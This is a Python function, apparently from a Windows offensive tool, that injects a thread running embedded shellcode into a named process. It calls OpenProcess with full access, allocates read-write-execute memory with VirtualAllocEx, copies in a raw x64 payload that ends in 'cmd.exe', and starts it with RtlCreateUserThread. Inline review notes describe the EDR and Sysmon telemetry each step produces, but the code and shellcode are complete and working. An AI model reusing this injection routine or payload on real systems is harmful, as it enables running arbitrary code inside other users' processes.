Inject a thread running your shellcode into a process
def InjectTo(proc_name) -> None:
    """Start a thread running the embedded payload inside the process named *proc_name*.

    The call chain is the textbook remote-injection sequence:
    OpenProcess -> VirtualAllocEx (RWX) -> WriteProcessMemory -> RtlCreateUserThread.
    Every step is a well-known telemetry point for EDR / Sysmon; the review
    notes inline mark where each one is observable.

    Args:
        proc_name: Process name handed to GetPid (defined elsewhere in this
            file) to resolve the target PID.

    Returns:
        None. A failed OpenProcess is logged through debug_print and aborts
        the routine; the return values of VirtualAllocEx, WriteProcessMemory
        and RtlCreateUserThread are not checked.

    Relies on module-level ``kernel32`` / ``ntdll`` handles and the ctypes
    names (HANDLE, BOOL, LPVOID, c_void_p, c_ulonglong, byref), all brought
    into scope outside this block.
    """
    dwDesiredAccess = 0x1f0fff  # PROCESS_ALL_ACCESS
    # NOTE(review): opening another process with the full access mask is
    # itself a high-signal event in process-access telemetry (e.g. Sysmon
    # Event ID 10) independent of anything done with the handle afterwards.
    dwProcessId = GetPid(proc_name)
    if not dwProcessId:
        debug_print("\t[-] No such process")
        # No return here: control falls through into OpenProcess with a
        # falsy PID and relies on the hProcess == 0 check below to abort.
    hProcess = kernel32.OpenProcess(dwDesiredAccess, False, dwProcessId)
    if hProcess == 0:
        debug_print("\t[-] Failed to get a handle to : %s" % (proc_name))
        return
    debug_print("\t[*] Handle to %s : 0x%x" % (proc_name, hProcess))
    # Opaque payload blob: this routine only takes its length and copies it
    # verbatim, nothing here decodes or validates it. The literal ends with
    # the ASCII bytes for "cmd.exe\0", consistent with the variable name.
    # Presumably a Python 2 file (an unprefixed str is used as a byte buffer).
    pop_cmd = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"
    flProtect = 0x40  # RWX (PAGE_EXECUTE_READWRITE)
    # NOTE(review): a private region that is writable AND executable in a
    # foreign process is the classic artifact that memory scanners and
    # allocation hooks flag; it never needs to be hidden from this comment.
    flAllocationType = 0x1000  # MEM_COMMIT
    # ctypes defaults restype to c_int; force a 64-bit return so the remote
    # address is not truncated on x64.
    kernel32.VirtualAllocEx.restype = c_ulonglong
    pShellcode = kernel32.VirtualAllocEx(hProcess, 0, len(pop_cmd), flAllocationType, flProtect)
    # The result (0 on failure) is passed straight on without being checked.
    kernel32.WriteProcessMemory.restype = BOOL
    kernel32.WriteProcessMemory.argtypes = (HANDLE, c_ulonglong, c_void_p, c_ulonglong, c_void_p)
    # Copy the payload into the remote RWX region; the BOOL result and the
    # bytes-written out-parameter (passed as 0/NULL) are both ignored.
    kernel32.WriteProcessMemory(hProcess, pShellcode, pop_cmd, len(pop_cmd), 0)
    hThread = HANDLE()
    ntdll.RtlCreateUserThread.argtypes = (HANDLE, c_void_p, BOOL, c_ulonglong, c_void_p, c_void_p, c_ulonglong, c_void_p, LPVOID, c_ulonglong)
    # Thread creation through the ntdll export with the start address set to
    # the freshly written region; hThread receives the new thread handle.
    # NOTE(review): going through ntdll does not bypass the kernel
    # thread-creation callbacks that feed Sysmon Event ID 8 and similar
    # telemetry, and a remote thread whose start address lies outside any
    # loaded image is a standard hunting query. Neither hThread nor hProcess
    # is closed before the function returns.
    ntdll.RtlCreateUserThread(hProcess, None, 0, 0, 0, 0, pShellcode, 0, byref(hThread), 0)